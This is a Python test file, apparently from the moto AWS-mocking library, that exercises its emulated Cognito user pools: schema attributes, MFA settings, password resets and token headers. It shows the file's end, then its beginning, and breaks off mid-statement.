"USERNAME": result["username"], }, ) caught = False try: conn.respond_to_auth_challenge( ClientId=result["client_id"], Session=challenge["Session"], ChallengeName=challenge["ChallengeName"], ChallengeResponses={ "SOFTWARE_TOKEN_MFA_CODE": "123456", "USERNAME": result["username"], "SECRET_HASH": invalid_secret_hash, }, ) except conn.exceptions.NotAuthorizedException: caught = True caught.should.be.true @mock_cognitoidp def test_admin_set_user_password(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) value = str(uuid.uuid4()) password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], ) conn.admin_set_user_password( UserPoolId=user_pool_id, Username=username, Password=password, Permanent=True ) result = conn.admin_get_user(UserPoolId=user_pool_id, Username=username) result["Username"].should.equal(username) result["UserAttributes"].should.have.length_of(2) def _verify_attribute(name, v): attr = [a for a in result["UserAttributes"] if a["Name"] == name] attr.should.have.length_of(1) attr[0]["Value"].should.equal(v) _verify_attribute("thing", value) @mock_cognitoidp def test_change_password_with_invalid_token_raises_error(): client = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: client.change_password( AccessToken=str(uuid.uuid4()), PreviousPassword="previous_password", ProposedPassword="newer_password", ) ex.value.response["Error"]["Code"].should.equal("NotAuthorizedException") @mock_cognitoidp def test_confirm_forgot_password_with_non_existent_client_id_raises_error(): client = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: client.confirm_forgot_password( ClientId="non-existent-client-id", Username="not-existent-username", ConfirmationCode=str(uuid.uuid4()), Password=str(uuid.uuid4()), ) ex.value.response["Error"]["Code"].should.equal("ResourceNotFoundException") @mock_cognitoidp def test_admin_reset_password_and_change_password(): client = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) temporary_pass = str(uuid.uuid4()) # Create pool and client user_pool_id = client.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = client.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] # Create CONFIRMED user with verified email client.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=temporary_pass ) client.confirm_sign_up( ClientId=client_id, Username=username, ConfirmationCode="123456" ) client.admin_update_user_attributes( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "email_verified", "Value": "true"}], ) # User should be in RESET_REQUIRED state after reset client.admin_reset_user_password(UserPoolId=user_pool_id, Username=username) result = client.admin_get_user(UserPoolId=user_pool_id, Username=username) result["UserStatus"].should.equal("RESET_REQUIRED") # Return to CONFIRMED status after NEW_PASSWORD_REQUIRED auth challenge auth_result = client.admin_initiate_auth( UserPoolId=user_pool_id, ClientId=client_id, AuthFlow="ADMIN_NO_SRP_AUTH", AuthParameters={"USERNAME": username, "PASSWORD": temporary_pass}, ) password = "Admin123!" auth_result = client.respond_to_auth_challenge( Session=auth_result["Session"], ClientId=client_id, ChallengeName="NEW_PASSWORD_REQUIRED", ChallengeResponses={"USERNAME": username, "NEW_PASSWORD": password}, ) result = client.admin_get_user(UserPoolId=user_pool_id, Username=username) result["UserStatus"].should.equal("CONFIRMED") # Return to CONFIRMED after user-initated password change client.admin_reset_user_password(UserPoolId=user_pool_id, Username=username) client.change_password( AccessToken=auth_result["AuthenticationResult"]["AccessToken"], PreviousPassword=password, ProposedPassword="Admin1234!", ) result = client.admin_get_user(UserPoolId=user_pool_id, Username=username) result["UserStatus"].should.equal("CONFIRMED") @mock_cognitoidp def test_admin_reset_password_disabled_user(): client = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) # Create pool user_pool_id = client.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Create disabled user client.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=str(uuid.uuid4()) ) client.admin_disable_user(UserPoolId=user_pool_id, Username=username) with pytest.raises(ClientError) as ex: client.admin_reset_user_password(UserPoolId=user_pool_id, Username=username) err = ex.value.response["Error"] err["Code"].should.equal("NotAuthorizedException") err["Message"].should.equal("User is disabled") @mock_cognitoidp def test_admin_reset_password_unconfirmed_user(): client = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) # Create pool user_pool_id = client.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Create user in status FORCE_CHANGE_PASSWORD client.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=str(uuid.uuid4()) ) with pytest.raises(ClientError) as ex: client.admin_reset_user_password(UserPoolId=user_pool_id, Username=username) err = ex.value.response["Error"] err["Code"].should.equal("NotAuthorizedException") err["Message"].should.equal("User password cannot be reset in the current state.") @mock_cognitoidp def test_admin_reset_password_no_verified_notification_channel(): client = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) # Create pool and client user_pool_id = client.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = client.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] # Create CONFIRMED user without verified email or phone client.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=str(uuid.uuid4()) ) client.confirm_sign_up( ClientId=client_id, Username=username, ConfirmationCode="123456" ) with pytest.raises(ClientError) as ex: client.admin_reset_user_password(UserPoolId=user_pool_id, Username=username) err = ex.value.response["Error"] err["Code"].should.equal("InvalidParameterException") err["Message"].should.equal( "Cannot reset password for the user as there is no registered/verified email or phone_number" ) @mock_cognitoidp def test_admin_reset_password_multiple_invocations(): client = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) # Create pool and client user_pool_id = client.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = client.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] # Create CONFIRMED user with verified email client.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=str(uuid.uuid4()) ) client.confirm_sign_up( ClientId=client_id, Username=username, ConfirmationCode="123456" ) client.admin_update_user_attributes( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "email_verified", "Value": "true"}], ) for _ in range(3): try: client.admin_reset_user_password(UserPoolId=user_pool_id, Username=username) user = client.admin_get_user(UserPoolId=user_pool_id, Username=username) user["UserStatus"].should.equal("RESET_REQUIRED") except ClientError: pytest.fail("Shouldn't throw error on consecutive invocations") # Test will retrieve public key from cognito.amazonaws.com/.well-known/jwks.json, # which isnt mocked in ServerMode if not settings.TEST_SERVER_MODE: @mock_cognitoidp def test_idtoken_contains_kid_header(): # https://github.com/spulec/moto/issues/3078 # Setup cognito = boto3.client("cognito-idp", "us-west-2") user_pool_id = cognito.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"][ "Id" ] client = cognito.create_user_pool_client( UserPoolId=user_pool_id, ExplicitAuthFlows=[ "ALLOW_ADMIN_USER_PASSWORD_AUTH", "ALLOW_REFRESH_TOKEN_AUTH", "ALLOW_ADMIN_NO_SRP_AUTH", ], AllowedOAuthFlows=["code", "implicit"], ClientName=str(uuid.uuid4()), CallbackURLs=["https://example.com"], ) client_id = client["UserPoolClient"]["ClientId"] username = str(uuid.uuid4()) temporary_password = "1TemporaryP@ssword" cognito.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=temporary_password, ) result = cognito.admin_initiate_auth( UserPoolId=user_pool_id, ClientId=client_id, AuthFlow="ADMIN_NO_SRP_AUTH", AuthParameters={"USERNAME": username, "PASSWORD": temporary_password}, ) # A newly created user is forced to set a new password # This sets a new password and logs the user in (creates tokens) password = "1F@kePassword" result = cognito.respond_to_auth_challenge( Session=result["Session"], ClientId=client_id, ChallengeName="NEW_PASSWORD_REQUIRED", ChallengeResponses={"USERNAME": username, "NEW_PASSWORD": password}, ) # id_token = result["AuthenticationResult"]["IdToken"] # Verify the KID header is present in the token, and corresponds to the KID supplied by the public JWT verify_kid_header(id_token) def verify_kid_header(token): """Verifies the kid-header is corresponds with the public key""" headers = jwt.get_unverified_headers(token) kid = headers["kid"] key_index = -1 keys = fetch_public_keys() for i in range(len(keys)): if kid == keys[i]["kid"]: key_index = i break if key_index == -1: raise Exception("Public key (kid) not found in jwks.json") def fetch_public_keys(): keys_url = "https://cognito-idp.{}.amazonaws.com/{}/.well-known/jwks.json".format( "us-west-2", "someuserpoolid" ) response = requests.get(keys_url).json() return response["keys"]
import base64 import boto3 import json import os import random import re import moto.cognitoidp.models import requests import hmac import hashlib import uuid # noinspection PyUnresolvedReferences import sure # noqa # pylint: disable=unused-import from botocore.exceptions import ClientError, ParamValidationError from jose import jws, jwt from unittest import SkipTest import pytest from moto import mock_cognitoidp, settings from moto.cognitoidp.utils import create_id from moto.core import ACCOUNT_ID @mock_cognitoidp def test_create_user_pool(): conn = boto3.client("cognito-idp", "us-west-2") name = str(uuid.uuid4()) value = str(uuid.uuid4()) result = conn.create_user_pool(PoolName=name, LambdaConfig={"PreSignUp": value}) result["UserPool"]["Id"].should_not.be.none result["UserPool"]["Id"].should.match(r"[\w-]+_[0-9a-zA-Z]+") result["UserPool"]["Arn"].should.equal( "arn:aws:cognito-idp:us-west-2:{}:userpool/{}".format( ACCOUNT_ID, result["UserPool"]["Id"] ) ) result["UserPool"]["Name"].should.equal(name) result["UserPool"]["LambdaConfig"]["PreSignUp"].should.equal(value) @mock_cognitoidp def test_create_user_pool_should_have_all_default_attributes_in_schema(): conn = boto3.client("cognito-idp", "us-west-2") name = str(uuid.uuid4()) result = conn.create_user_pool(PoolName=name) result_schema = result["UserPool"]["SchemaAttributes"] result_schema = {s["Name"]: s for s in result_schema} described_schema = conn.describe_user_pool(UserPoolId=result["UserPool"]["Id"])[ "UserPool" ]["SchemaAttributes"] described_schema = {s["Name"]: s for s in described_schema} for schema in result_schema, described_schema: for ( default_attr_name, default_attr, ) in moto.cognitoidp.models.CognitoIdpUserPoolAttribute.STANDARD_SCHEMA.items(): attribute = schema[default_attr_name] attribute["Required"].should.equal(default_attr["Required"]) attribute["AttributeDataType"].should.equal( default_attr["AttributeDataType"] ) attribute["Mutable"].should.equal(default_attr["Mutable"]) attribute.get("StringAttributeConstraints", None).should.equal( default_attr.get("StringAttributeConstraints", None) ) attribute.get("NumberAttributeConstraints", None).should.equal( default_attr.get("NumberAttributeConstraints", None) ) attribute["DeveloperOnlyAttribute"].should.be.false @mock_cognitoidp def test_create_user_pool_unknown_attribute_data_type(): conn = boto3.client("cognito-idp", "us-west-2") name = str(uuid.uuid4()) attribute_data_type = "Banana" with pytest.raises(ClientError) as ex: conn.create_user_pool( PoolName=name, Schema=[{"Name": "custom", "AttributeDataType": attribute_data_type,},], ) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( f"Validation error detected: Value '{attribute_data_type}' failed to satisfy constraint: Member must satisfy enum value set: [Boolean, Number, String, DateTime]" ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_create_user_pool_custom_attribute_without_data_type(): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.create_user_pool(PoolName=str(uuid.uuid4()), Schema=[{"Name": "custom",},]) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( "Invalid AttributeDataType input, consider using the provided AttributeDataType enum." ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_create_user_pool_custom_attribute_defaults(): conn = boto3.client("cognito-idp", "us-west-2") res = conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[ {"Name": "string", "AttributeDataType": "String",}, {"Name": "number", "AttributeDataType": "Number",}, ], ) string_attribute = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:string" ) string_attribute["DeveloperOnlyAttribute"].should.be.false string_attribute["Mutable"].should.be.true string_attribute.get("StringAttributeConstraints").should.be.none number_attribute = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:number" ) number_attribute["DeveloperOnlyAttribute"].should.be.false number_attribute["Mutable"].should.be.true number_attribute.get("NumberAttributeConstraints").should.be.none @mock_cognitoidp def test_create_user_pool_custom_attribute_developer_only(): conn = boto3.client("cognito-idp", "us-west-2") res = conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[ { "Name": "banana", "AttributeDataType": "String", "DeveloperOnlyAttribute": True, }, ], ) # Note that this time we are looking for 'dev:xyz' attribute attribute = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "dev:custom:banana" ) attribute["DeveloperOnlyAttribute"].should.be.true @mock_cognitoidp def test_create_user_pool_custom_attribute_required(): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[ {"Name": "banana", "AttributeDataType": "String", "Required": True}, ], ) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( "Required custom attributes are not supported currently." ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp @pytest.mark.parametrize( "attribute", [ {"Name": "email", "AttributeDataType": "Number"}, {"Name": "email", "DeveloperOnlyAttribute": True}, ], ids=["standard_attribute", "developer_only"], ) def test_create_user_pool_standard_attribute_with_changed_data_type_or_developer_only( attribute, ): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.create_user_pool(PoolName=str(uuid.uuid4()), Schema=[attribute]) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( f"You can not change AttributeDataType or set developerOnlyAttribute for standard schema attribute {attribute['Name']}" ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_create_user_pool_attribute_with_schema(): conn = boto3.client("cognito-idp", "us-west-2") res = conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[ { "Name": "string", "AttributeDataType": "String", "NumberAttributeConstraints": {"MinValue": "10", "MaxValue": "20"}, "StringAttributeConstraints": {"MinLength": "10", "MaxLength": "20"}, }, { "Name": "number", "AttributeDataType": "Number", "NumberAttributeConstraints": {"MinValue": "10", "MaxValue": "20"}, "StringAttributeConstraints": {"MinLength": "10", "MaxLength": "20"}, }, { "Name": "boolean", "AttributeDataType": "Boolean", "NumberAttributeConstraints": {"MinValue": "10", "MaxValue": "20"}, "StringAttributeConstraints": {"MinLength": "10", "MaxLength": "20"}, }, ], ) string_attribute = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:string" ) string_attribute["StringAttributeConstraints"].should.equal( {"MinLength": "10", "MaxLength": "20"} ) string_attribute.get("NumberAttributeConstraints").should.be.none number_attribute = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:number" ) number_attribute["NumberAttributeConstraints"].should.equal( {"MinValue": "10", "MaxValue": "20"} ) number_attribute.get("StringAttributeConstraints").should.be.none boolean_attribute = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:boolean" ) boolean_attribute.get("NumberAttributeConstraints").should.be.none boolean_attribute.get("StringAttributeConstraints").should.be.none @mock_cognitoidp def test_create_user_pool_attribute_partial_schema(): conn = boto3.client("cognito-idp", "us-west-2") res = conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[ { "Name": "string_no_min", "AttributeDataType": "String", "StringAttributeConstraints": {"MaxLength": "10"}, }, { "Name": "string_no_max", "AttributeDataType": "String", "StringAttributeConstraints": {"MinLength": "10"}, }, { "Name": "number_no_min", "AttributeDataType": "Number", "NumberAttributeConstraints": {"MaxValue": "10"}, }, { "Name": "number_no_max", "AttributeDataType": "Number", "NumberAttributeConstraints": {"MinValue": "10"}, }, ], ) string_no_min = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:string_no_min" ) string_no_max = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:string_no_max" ) number_no_min = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:number_no_min" ) number_no_max = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:number_no_max" ) string_no_min["StringAttributeConstraints"]["MaxLength"].should.equal("10") string_no_min["StringAttributeConstraints"].get("MinLength", None).should.be.none string_no_max["StringAttributeConstraints"]["MinLength"].should.equal("10") string_no_max["StringAttributeConstraints"].get("MaxLength", None).should.be.none number_no_min["NumberAttributeConstraints"]["MaxValue"].should.equal("10") number_no_min["NumberAttributeConstraints"].get("MinValue", None).should.be.none number_no_max["NumberAttributeConstraints"]["MinValue"].should.equal("10") number_no_max["NumberAttributeConstraints"].get("MaxValue", None).should.be.none @mock_cognitoidp @pytest.mark.parametrize( ("constraint_type", "attribute"), [ ( "StringAttributeConstraints", { "Name": "email", "AttributeDataType": "String", "StringAttributeConstraints": {"MinLength": "invalid_value"}, }, ), ( "StringAttributeConstraints", { "Name": "email", "AttributeDataType": "String", "StringAttributeConstraints": {"MaxLength": "invalid_value"}, }, ), ( "NumberAttributeConstraints", { "Name": "updated_at", "AttributeDataType": "Number", "NumberAttributeConstraints": {"MaxValue": "invalid_value"}, }, ), ( "NumberAttributeConstraints", { "Name": "updated_at", "AttributeDataType": "Number", "NumberAttributeConstraints": {"MinValue": "invalid_value"}, }, ), ], ids=[ "invalid_min_length", "invalid_max_length", "invalid_max_value", "invalid_min_value", ], ) def test_create_user_pool_invalid_schema_values(constraint_type, attribute): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.create_user_pool(PoolName=str(uuid.uuid4()), Schema=[attribute]) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( f"Invalid {constraint_type} for schema attribute {attribute['Name']}" ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp @pytest.mark.parametrize( "attribute", [ { "Name": "email", "AttributeDataType": "String", "StringAttributeConstraints": {"MinLength": "2049"}, }, { "Name": "email", "AttributeDataType": "String", "StringAttributeConstraints": {"MaxLength": "2049"}, }, ], ids=["invalid_min_length", "invalid_max_length"], ) def test_create_user_pool_string_schema_max_length_over_2048(attribute): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.create_user_pool(PoolName=str(uuid.uuid4()), Schema=[attribute]) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( f"user.{attribute['Name']}: String attributes cannot have a length of more than 2048" ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_create_user_pool_string_schema_min_bigger_than_max(): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[ { "Name": "email", "AttributeDataType": "String", "StringAttributeConstraints": {"MinLength": "2", "MaxLength": "1"}, } ], ) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( f"user.email: Max length cannot be less than min length." ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_create_user_pool_number_schema_min_bigger_than_max(): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[ { "Name": "updated_at", "AttributeDataType": "Number", "NumberAttributeConstraints": {"MinValue": "2", "MaxValue": "1"}, } ], ) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( f"user.updated_at: Max value cannot be less than min value." ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_add_custom_attributes(): conn = boto3.client("cognito-idp", "us-west-2") pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] custom_attribute = {"Name": "banana", "AttributeDataType": "String"} res = conn.add_custom_attributes( UserPoolId=pool_id, CustomAttributes=[custom_attribute] ) res["ResponseMetadata"]["HTTPStatusCode"].should.equal(200) res = conn.describe_user_pool(UserPoolId=pool_id) described_attribute = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:banana" ) # Skip verification - already covered by create_user_pool with custom attributes described_attribute.should_not.be.none @mock_cognitoidp def test_add_custom_attributes_existing_attribute(): conn = boto3.client("cognito-idp", "us-west-2") custom_attribute = { "Name": "banana", "AttributeDataType": "String", "DeveloperOnlyAttribute": True, } pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[custom_attribute] )["UserPool"]["Id"] with pytest.raises(ClientError) as ex: conn.add_custom_attributes( UserPoolId=pool_id, CustomAttributes=[custom_attribute] ) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( f"custom:banana: Existing attribute already has name dev:custom:banana." ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_list_user_pools(): conn = boto3.client("cognito-idp", "us-west-2") name = str(uuid.uuid4()) conn.create_user_pool(PoolName=name) result = conn.list_user_pools(MaxResults=10) result["UserPools"].should.have.length_of(1) result["UserPools"][0]["Name"].should.equal(name) @mock_cognitoidp def test_set_user_pool_mfa_config(): conn = boto3.client("cognito-idp", "us-west-2") name = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=name)["UserPool"]["Id"] # Test error for when neither token nor sms configuration is provided with pytest.raises(ClientError) as ex: conn.set_user_pool_mfa_config( UserPoolId=user_pool_id, MfaConfiguration="ON", ) ex.value.operation_name.should.equal("SetUserPoolMfaConfig") ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( "At least one of [SmsMfaConfiguration] or [SoftwareTokenMfaConfiguration] must be provided." ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) # Test error for when sms config is missing `SmsConfiguration` with pytest.raises(ClientError) as ex: conn.set_user_pool_mfa_config( UserPoolId=user_pool_id, SmsMfaConfiguration={}, MfaConfiguration="ON", ) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( "[SmsConfiguration] is a required member of [SoftwareTokenMfaConfiguration]." ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) # Test error for when `SmsConfiguration` is missing `SnsCaller` # This is asserted by boto3 with pytest.raises(ParamValidationError) as ex: conn.set_user_pool_mfa_config( UserPoolId=user_pool_id, SmsMfaConfiguration={"SmsConfiguration": {}}, MfaConfiguration="ON", ) # Test error for when `MfaConfiguration` is not one of the expected values with pytest.raises(ClientError) as ex: conn.set_user_pool_mfa_config( UserPoolId=user_pool_id, SoftwareTokenMfaConfiguration={"Enabled": True}, MfaConfiguration="Invalid", ) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( "[MfaConfiguration] must be one of 'ON', 'OFF', or 'OPTIONAL'." ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) # Enable software token MFA mfa_config = conn.set_user_pool_mfa_config( UserPoolId=user_pool_id, SoftwareTokenMfaConfiguration={"Enabled": True}, MfaConfiguration="ON", ) mfa_config.shouldnt.have.key("SmsMfaConfiguration") mfa_config["MfaConfiguration"].should.equal("ON") mfa_config["SoftwareTokenMfaConfiguration"].should.equal({"Enabled": True}) # Response from describe should match pool = conn.describe_user_pool(UserPoolId=user_pool_id)["UserPool"] pool["MfaConfiguration"].should.equal("ON") # Disable MFA mfa_config = conn.set_user_pool_mfa_config( UserPoolId=user_pool_id, MfaConfiguration="OFF", ) mfa_config.shouldnt.have.key("SmsMfaConfiguration") mfa_config.shouldnt.have.key("SoftwareTokenMfaConfiguration") mfa_config["MfaConfiguration"].should.equal("OFF") # Response from describe should match pool = conn.describe_user_pool(UserPoolId=user_pool_id)["UserPool"] pool["MfaConfiguration"].should.equal("OFF") # `SnsCallerArn` needs to be at least 20 long sms_config = {"SmsConfiguration": {"SnsCallerArn": "01234567890123456789"}} # Enable SMS MFA mfa_config = conn.set_user_pool_mfa_config( UserPoolId=user_pool_id, SmsMfaConfiguration=sms_config, MfaConfiguration="ON", ) mfa_config.shouldnt.have.key("SoftwareTokenMfaConfiguration") mfa_config["SmsMfaConfiguration"].should.equal(sms_config) mfa_config["MfaConfiguration"].should.equal("ON") @mock_cognitoidp def test_list_user_pools_returns_max_items(): conn = boto3.client("cognito-idp", "us-west-2") # Given 10 user pools pool_count = 10 for _ in range(pool_count): conn.create_user_pool(PoolName=str(uuid.uuid4())) max_results = 5 result = conn.list_user_pools(MaxResults=max_results) result["UserPools"].should.have.length_of(max_results) result.should.have.key("NextToken") @mock_cognitoidp def test_list_user_pools_returns_next_tokens(): conn = boto3.client("cognito-idp", "us-west-2") # Given 10 user pool clients pool_count = 10 for _ in range(pool_count): conn.create_user_pool(PoolName=str(uuid.uuid4())) max_results = 5 result = conn.list_user_pools(MaxResults=max_results) result["UserPools"].should.have.length_of(max_results) result.should.have.key("NextToken") next_token = result["NextToken"] result_2 = conn.list_user_pools(MaxResults=max_results, NextToken=next_token) result_2["UserPools"].should.have.length_of(max_results) result_2.shouldnt.have.key("NextToken") @mock_cognitoidp def test_list_user_pools_when_max_items_more_than_total_items(): conn = boto3.client("cognito-idp", "us-west-2") # Given 10 user pool clients pool_count = 10 for _ in range(pool_count): conn.create_user_pool(PoolName=str(uuid.uuid4())) max_results = pool_count + 5 result = conn.list_user_pools(MaxResults=max_results) result["UserPools"].should.have.length_of(pool_count) result.shouldnt.have.key("NextToken") @mock_cognitoidp def test_describe_user_pool(): conn = boto3.client("cognito-idp", "us-west-2") name = str(uuid.uuid4()) value = str(uuid.uuid4()) user_pool_details = conn.create_user_pool( PoolName=name, LambdaConfig={"PreSignUp": value}, AccountRecoverySetting={ "RecoveryMechanisms": [{"Name": "verified_email", "Priority": 1}] }, ) result = conn.describe_user_pool(UserPoolId=user_pool_details["UserPool"]["Id"]) result["UserPool"]["Name"].should.equal(name) result["UserPool"]["LambdaConfig"]["PreSignUp"].should.equal(value) result["UserPool"]["AccountRecoverySetting"]["RecoveryMechanisms"][0][ "Name" ].should.equal("verified_email") result["UserPool"]["AccountRecoverySetting"]["RecoveryMechanisms"][0][ "Priority" ].should.equal(1) @mock_cognitoidp def test_describe_user_pool_estimated_number_of_users(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] result = conn.describe_user_pool(UserPoolId=user_pool_id) result["UserPool"]["EstimatedNumberOfUsers"].should.equal(0) users_count = random.randint(2, 6) for _ in range(users_count): conn.admin_create_user(UserPoolId=user_pool_id, Username=str(uuid.uuid4())) result = conn.describe_user_pool(UserPoolId=user_pool_id) result["UserPool"]["EstimatedNumberOfUsers"].should.equal(users_count) @mock_cognitoidp def test_describe_user_pool_resource_not_found(): conn = boto3.client("cognito-idp", "us-east-1") user_pool_id = "us-east-1_FooBar123" with pytest.raises(ClientError) as exc: conn.describe_user_pool(UserPoolId=user_pool_id) err = exc.value.response["Error"] err["Code"].should.equal("ResourceNotFoundException") err["Message"].should.equal(f"User pool {user_pool_id} does not exist.") @mock_cognitoidp def test_update_user_pool(): conn = boto3.client("cognito-idp", "us-east-1") name = str(uuid.uuid4()) user_pool_details = conn.create_user_pool( PoolName=name, Policies={ "PasswordPolicy": { "MinimumLength": 12, "RequireUppercase": False, "RequireLowercase": False, "RequireNumbers": False, "RequireSymbols": False, } }, ) new_policies = { "PasswordPolicy": { "MinimumLength": 16, "RequireUppercase": True, "RequireLowercase": True, "RequireNumbers": True, "RequireSymbols": True, } } conn.update_user_pool( UserPoolId=user_pool_details["UserPool"]["Id"], Policies=new_policies ) updated_user_pool_details = conn.describe_user_pool( UserPoolId=user_pool_details["UserPool"]["Id"] ) updated_user_pool_details["UserPool"]["Policies"].should.equal(new_policies) @mock_cognitoidp def test_delete_user_pool(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.list_user_pools(MaxResults=10)["UserPools"].should.have.length_of(1) conn.delete_user_pool(UserPoolId=user_pool_id) conn.list_user_pools(MaxResults=10)["UserPools"].should.have.length_of(0) @mock_cognitoidp def test_create_user_pool_domain(): conn = boto3.client("cognito-idp", "us-west-2") domain = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] result = conn.create_user_pool_domain(UserPoolId=user_pool_id, Domain=domain) result["ResponseMetadata"]["HTTPStatusCode"].should.equal(200) result["CloudFrontDomain"].should_not.be.none @mock_cognitoidp def test_create_user_pool_domain_custom_domain_config(): conn = boto3.client("cognito-idp", "us-west-2") domain = str(uuid.uuid4()) custom_domain_config = { "CertificateArn": "arn:aws:acm:us-east-1:{}:certificate/123456789012".format( ACCOUNT_ID ) } user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] result = conn.create_user_pool_domain( UserPoolId=user_pool_id, Domain=domain, CustomDomainConfig=custom_domain_config ) result["ResponseMetadata"]["HTTPStatusCode"].should.equal(200) result["CloudFrontDomain"].should.equal("e2c343b3293ee505.cloudfront.net") @mock_cognitoidp def test_describe_user_pool_domain(): conn = boto3.client("cognito-idp", "us-west-2") domain = 